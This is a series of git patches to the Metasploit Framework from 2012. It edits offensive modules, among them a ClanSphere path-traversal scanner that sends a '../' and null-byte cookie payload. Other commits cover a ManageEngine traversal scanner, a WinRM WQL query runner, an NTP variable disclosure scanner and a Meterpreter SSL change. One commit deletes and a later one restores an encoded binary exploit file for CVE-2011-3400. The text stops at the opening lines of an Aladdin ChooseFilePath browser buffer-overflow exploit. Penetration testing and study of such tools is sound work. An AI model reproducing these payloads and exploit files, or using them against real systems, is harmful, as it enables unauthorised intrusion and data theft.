a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index cc5591b8e6..421dc75ceb 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -154,7 +154,7 @@ class Client ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx) # Use non-blocking OpenSSL operations on Windows - if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows ) + if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows ) ssl.accept else begin @@ -211,12 +211,19 @@ class Client cert.version = 2 cert.serial = rand(0xFFFFFFFF) + # Depending on how the socket was created, getsockname will + # return either a struct sockaddr as a String (the default ruby + # Socket behavior) or an Array (the extend'd Rex::Socket::Tcp + # behavior). Avoid the ambiguity by always picking a random + # hostname. See #7350. + subject_cn = Rex::Text.rand_hostname + subject = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10)], ["O", Rex::Text.rand_text_alpha(rand(20) + 10)], - ["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname], + ["CN", subject_cn], ]) issuer = OpenSSL::X509::Name.new([ ["C","US"], From 5e873d06972279b99306b7e4563bb530a2620888 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 30 Oct 2012 12:15:01 +0100 Subject: [PATCH 29/64] adding peer information to error message --- .../scanner/http/manageengine_securitymanager_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index b716be0c79..94d7797e8e 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From c91f0ca535547d5598382f590a887cbcea25aafe Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 09:13:55 -0500 Subject: [PATCH 30/64] Adds the WQL execution module --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 69 ++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/scanner/winrm/winrm_wql.rb diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb new file mode 100644 index 0000000000..cb33fdb476 --- /dev/null +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -0,0 +1,69 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' +require 'rex/proto/ntlm/message' + + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::WinRM + include Msf::Auxiliary::Report + + + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'WinRM WQL Query Runner', + 'Version' => '$Revision$', + 'Description' => %q{ + This module runs WQL queries against remote WinRM Services. + Authentication is required. Currently only works with NTLM auth. + }, + 'Author' => [ 'thelightcosine' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('WQL', [ true, "The WQL query to run", "Select Name,Status from Win32_Service" ]), + OptString.new('USERNAME', [ true, "The username to authenticate as"]), + OptString.new('PASSWORD', [ true, "The password to authenticate with"]) + ], self.class) + end + + + def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end + + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if resp.code == 401 + print_error "Login Failure! Recheck the supplied credentials." + return + end + + unless resp.code == 200 + print_error "Got unexpected response from #{ip}: \n #{resp.to_s}" + return + end + resp_tbl = parse_wql_response(resp) + print_good resp_tbl.to_s + store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + end + + + +end From 3f3e6814a39ebb2e736bbd9341b38c83003b2b03 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 30 Oct 2012 10:40:56 -0500 Subject: [PATCH 31/64] Make sure no extra '/' in there --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 186ef60177..ca0562fbc2 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -51,11 +51,15 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + f = datastore['FILE'] + f = f[1, f.length] if f =~ /^\// + res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}index.php", - 'cookie' => "blah=blah; cs_lang=#{traverse}#{datastore['FILE']}%00.png" + 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png" }) if res and res.body =~ /^Fatal error\:/ From d3bb2b489153d5e392768451d1e9ef8357bd2d6f Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 11:08:57 -0500 Subject: [PATCH 32/64] minor fixups --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index cb33fdb476..8cb82a2db9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'WinRM WQL Query Runner', 'Version' => '$Revision$', 'Description' => %q{ - This module runs WQL queries against remote WinRM Services. + This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. }, 'Author' => [ 'thelightcosine' ], @@ -48,8 +48,12 @@ class Metasploit3 < Msf::Auxiliary print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" return end - + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if resp.nil? + print_error "Got no reply from the server" + return + end if resp.code == 401 print_error "Login Failure! Recheck the supplied credentials." return @@ -61,7 +65,8 @@ class Metasploit3 < Msf::Auxiliary end resp_tbl = parse_wql_response(resp) print_good resp_tbl.to_s - store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + path = store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + print_status "Results saved to #{path}" end From a636971b71ebf5c0213fbea91c7b028049bc5bfe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 30 Oct 2012 11:39:25 -0500 Subject: [PATCH 33/64] Change error message --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index ca0562fbc2..377ae0b4aa 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -63,7 +63,10 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("Either '#{datastore['FILE']}' does not exist, or no permission.") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("\t1. File does not exist.") + print_error("\t2. No permission.") + print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") elsif res and res.code == 200 pattern_end = " UTC +1 - Load:" From 357fd1b955660d364c4d100a5da04ee875295498 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 30 Oct 2012 17:47:17 +0100 Subject: [PATCH 34/64] add peer info to print_error message --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 377ae0b4aa..44fcad9341 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") From 8fd34a4475d14f7020ab7b6e13735e04bb820e00 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 21:08:01 -0200 Subject: [PATCH 35/64] Update NTP Module Changed the branche and remove CR --- data/exploits/CVE-2011-3400/CVE-2011-3400.vsd | Bin 26720 -> 0 bytes modules/auxiliary/scanner/ntp/ntp_readvar.rb | 6 ++---- 2 files changed, 2 insertions(+), 4 deletions(-) delete mode 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd deleted file mode 100755 index b7b8116d3d54259080beda14c45430df5998c966..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 26720 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

j;lwk&564r&YWF+SCTVHdi{G5cMpYEBiJ&r2 z4qR-;eo7qJf#a#+%Ki4X?X}GomP`LQp;`9?L9MT|YHW7kzyS_ree8M@kli*aZPe_o zv%Pf)vE4sTz84`;);yq2-gEb+yS)t|4H}vg>VIjo%2#GJXL6?h%T6%W?zDjgNAD@U##0ZvL-q63`VAFLxsMb8{DPI`sT zuS7X@zRrVLF>0q^wAT4!qIT+hod>gG)K0-@t@Fo3?bP`?4`#)vor2L?=Z|@J+DU#x zQoekYB7gAIUN;*;cv->Nm0%TE4c36QU>#TwHh?dKuK@XN$Bp1_unBAi_kgd0d%=BR z3-}t?3gowD?+4q#*Ma;F=r_PO!A|f1co6IY-vYbAx4|B;7d!;M1NMQ3!6V?i;8Cz2 zJO&;I2f#tl1ilBJ0EfVn;QQb(I0BvmKL9@jN5L_09Q+9U82kjB06zuI;Ah|@I0b$V zo(9i=Ux3q~1^g2H3j7*83!VeN0sL8kaTc5dzXiVo&x7BCKY;U~6}$jm1b+lCfj@yi zgA3py_zU 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -64,4 +62,4 @@ class Metasploit3 < Msf::Auxiliary end -end \ No newline at end of file +end From b085e8ed735f4518c0f21d2ae8de1ca44f256584 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 21:43:21 -0200 Subject: [PATCH 36/64] Revert "Update NTP Module" This reverts commit 8fd34a4475d14f7020ab7b6e13735e04bb820e00. --- data/exploits/CVE-2011-3400/CVE-2011-3400.vsd | Bin 0 -> 26720 bytes modules/auxiliary/scanner/ntp/ntp_readvar.rb | 6 ++++-- 2 files changed, 4 insertions(+), 2 deletions(-) create mode 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd new file mode 100755 index 0000000000000000000000000000000000000000..b7b8116d3d54259080beda14c45430df5998c966 GIT binary patch literal 26720 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

j;lwk&564r&YWF+SCTVHdi{G5cMpYEBiJ&r2 z4qR-;eo7qJf#a#+%Ki4X?X}GomP`LQp;`9?L9MT|YHW7kzyS_ree8M@kli*aZPe_o zv%Pf)vE4sTz84`;);yq2-gEb+yS)t|4H}vg>VIjo%2#GJXL6?h%T6%W?zDjgNAD@U##0ZvL-q63`VAFLxsMb8{DPI`sT zuS7X@zRrVLF>0q^wAT4!qIT+hod>gG)K0-@t@Fo3?bP`?4`#)vor2L?=Z|@J+DU#x zQoekYB7gAIUN;*;cv->Nm0%TE4c36QU>#TwHh?dKuK@XN$Bp1_unBAi_kgd0d%=BR z3-}t?3gowD?+4q#*Ma;F=r_PO!A|f1co6IY-vYbAx4|B;7d!;M1NMQ3!6V?i;8Cz2 zJO&;I2f#tl1ilBJ0EfVn;QQb(I0BvmKL9@jN5L_09Q+9U82kjB06zuI;Ah|@I0b$V zo(9i=Ux3q~1^g2H3j7*83!VeN0sL8kaTc5dzXiVo&x7BCKY;U~6}$jm1b+lCfj@yi zgA3py_zU 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -62,4 +64,4 @@ class Metasploit3 < Msf::Auxiliary end -end +end \ No newline at end of file From ffe8a980f45ab98fd9b46f89bf7364f957e1cb3a Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 22:25:23 -0200 Subject: [PATCH 37/64] NTP Module - Remove [WARNING] Carriage return EOL --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 34cbd132f9..15a2cad93f 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -1,11 +1,7 @@ -##### - - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ -## +# http://metasploit.com/ require 'msf/core' @@ -21,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -64,4 +60,4 @@ class Metasploit3 < Msf::Auxiliary end -end \ No newline at end of file +end From a2fd377326bf15b4abed582245c44ced86bef4da Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 09:20:00 +0100 Subject: [PATCH 38/64] module cleanup --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 36 +++++++++++--------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 15a2cad93f..988eeffe29 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -17,16 +17,16 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive - information, such as the NTP software version, operating system version, peers, and more.. + This module reads the system internal NTP variables. These variables contain + potentially sensitive information, such as the NTP software version, operating + system version, peers, and more. }, - 'Author' => 'Ewerson Guimaraes(Crash) ', + 'Author' => [ 'Ewerson Guimaraes(Crash) ' ], 'License' => MSF_LICENSE, - 'Version' => '', 'References' => [ - ['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ], - ] + [ 'URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ], + ] ) ) register_options( @@ -45,17 +45,21 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending command") udp_sock.put(readvar) reply = udp_sock.recvfrom(65535, 0.1) - p_reply =( reply[0].split(",")) + if not reply or reply[0].empty? + print_error("#{rhost}:#{rport} - Couldn't read NTP variables") + return + end + p_reply = reply[0].split(",") arr_count = 0 - while ( arr_count < p_reply.size) - if arr_count == 0 - print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage - arr_count = arr_count + 1 - else - print_good (p_reply[arr_count].strip) - arr_count = arr_count + 1 - end - end + while ( arr_count < p_reply.size) + if arr_count == 0 + print_good("#{rhost}:#{rport} - #{p_reply[arr_count].slice(12,p_reply[arr_count].size)}") #12 is the adjustment of packet garbage + arr_count = arr_count + 1 + else + print_good("#{rhost}:#{rport} - #{p_reply[arr_count].strip}") + arr_count = arr_count + 1 + end + end disconnect_udp end From ec8a2955e1f0b46c5fc61609d73b4ee76127b132 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 03:32:43 -0500 Subject: [PATCH 39/64] Add OSVDB-86723 Aladdin Knowledge System ChooseFilePath Bof --- .../browser/aladdin_choosefilepath_bof.rb | 205 ++++++++++++++++++ 1 file changed, 205 insertions(+) create mode 100644 modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb new file mode 100644 index 0000000000..9e93d651d3 --- /dev/null +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -0,0 +1,205 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "7.0", + :javascript => true, + :os_name => 